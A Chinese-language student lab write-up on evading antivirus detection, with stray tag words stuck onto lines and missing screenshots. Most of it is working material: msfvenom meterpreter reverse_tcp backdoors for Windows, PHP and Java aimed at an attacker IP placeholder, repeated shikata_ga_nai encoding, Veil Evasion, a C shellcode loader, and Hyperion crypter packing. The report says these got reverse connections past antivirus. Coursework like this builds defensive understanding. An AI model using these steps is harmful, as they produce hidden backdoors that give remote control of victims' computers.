1.對某個文件的特徵碼進行分析,(特徵碼就是一類惡意文件中常常出現的一段代碼),若是檢測到特徵碼就會被判定爲惡意軟件。
2.啓發式惡意軟件檢測,是根據某些特徵去推斷是否爲惡意軟件。
3.根據行爲進行惡意軟件檢測: 經過對惡意代碼的觀察研究,發現有一些行爲是惡意代碼共同的比較特殊的行爲,就會認定爲是惡意軟件。php
使用一些技術手段,不讓殺軟所檢測到。java
文件免殺方法:
1.加殼,如加壓縮殼和加密殼。
2.加花指令,通常一個木馬程序加入花指令後,就能夠躲大部分的殺毒軟件,不像改特徵碼,只能躲過某一種殺毒軟件。
3.改程序入口點。
4.改木馬文件特徵碼shell
開啓殺軟能起到防止電腦中惡意代碼的風險,但不是絕對的。首先未錄入病毒庫的惡意代碼就有可能避開殺軟侵入到電腦。或者可使用更高級的編碼技術來隱藏惡意代碼的特徵碼。編程
-e
:選擇編碼器,-b
:是payload中須要去除的字符,-i
是迭代的次數,由於shellcode以\x00
爲結束符,所喲在-b
後面要跟一個\x00
。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=攻擊機的IP LPORT=端口號 -f exe > xxx.exe
使用一下十次編譯的方法:-i
後跟一個10
便可。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=攻擊機的IP LPORT=端口號 -f exe > xxx.exe
windows
生成PHP後門程序使用命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.php
生成文件以下圖:
放入virscan中進行測試:
網絡
生成jar後門程序使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=攻擊機的IP LPORT=端口號 x> xxx.jar
生成文件以下圖:
放入virscan中進行測試:
tcp
veil
,再用use evasion命令進入Evil-Evasion進入以下界面:/var/lib/veil/output/compiled/veil_c_5235.exe
檢測結果:
工具
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊機ip LPORT=端口號 -f c
用c語言生成一段shellcode。建立一個文件20165235.c,而後將unsigned char buf[] 拷貝到其中:學習
unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" ........ "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ 20165235.c -o 20165235.exe
編譯這個.c文件爲可執行文件:將其複製到Windows上,被殺軟檢測到:
測試
設置白名單以後進行反彈鏈接:
將qy_upxed.exe拷貝到/usr/share/windows-binaries/hyperion/
,而且進入到這個文件目錄下,使用終端輸入命令wine hyperion.exe -v qy_upxed.exe qy_upxed_Hyperion.exe
進行加加密殼:
加密殼的免殺和反彈鏈接:
11.1.0.2001
。反彈鏈接的結果:
本次實驗咱們只是簡單的對文件進行加殼隱藏特徵碼來免殺,可是如今的病毒庫更新速度很快,應該學會結合多種技術來免殺,如結合加殼,更換編碼,修改程序入口,隱藏惡意軟件共有的行爲等來進行免殺。
解決方法:我前後關閉了殺軟,防火牆等軟件,但仍是沒用。更換了端口號也是沒什麼用,將shellcode拷貝到win7虛擬機也是一樣被終止。最後我讓同窗幫我在他的kali上生成後門軟件,並將ip和端口號進行了修改,最後完成了反彈鏈接實驗。
本次實驗要就掌握msf編碼器,使用msfvenom生成各類類型的後門軟件,並且最大的收穫值學會了shellcode注入。在進行實驗的時候遇到了很多的問題,如後門程序在win7上運行時會中斷等問題。但最終仍是解決了這些問題。 學習完本次的實驗對免殺原理有了深層次的瞭解。對之後網絡惡意軟件的防範有了紮實的理論支持。